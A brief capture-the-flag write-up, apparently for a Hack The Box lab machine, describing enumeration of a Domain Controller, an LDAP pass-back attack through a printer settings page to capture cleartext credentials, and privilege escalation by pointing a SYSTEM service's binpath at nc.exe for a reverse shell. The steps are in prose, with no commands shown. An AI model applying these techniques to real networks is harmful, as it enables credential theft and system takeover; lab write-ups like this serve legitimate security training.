Enumeration

Nmap

The Nmap scan revealed open ports for SMB, LDAP, and Kerberos, which strongly suggests that the target is a Domain Controller. Additionally, an HTTP port was also found to be open.

00 - nmap output

WEB

Web enumeration revealed a settings page that allowed updating the server IP address for the printer service. This service was communicating over cleartext LDAP.

01 - settings

Exploitation

LDAP Pass-Back Attack

From there, it was straightforward. I followed the guide in this post and successfully carried out an LDAP Pass-Back Attack. I started a listener and updated the server IP with my own. As a result, I was able to capture the cleartext login credentials using Wireshark.

02 - listener

03 - my ip

04 - got the password

Got The User

05 - got the user

Privilege Escalation

Server Operators Group

Privilege escalation was straightforward—the current service account was a member of the Server Operators group. I leveraged this by updating the binpath of the VMware Tools service (which runs with SYSTEM privileges) to execute nc.exe. After starting a listener and restarting the service, I received a SYSTEM shell. (Followed this post)

07 - privesc start

08 - rev shell

09 - gotcha

Pwned

pwned

<
Previous Post
Timelapse - Hack The Box
>
Next Post
Intelligence - Hack The Box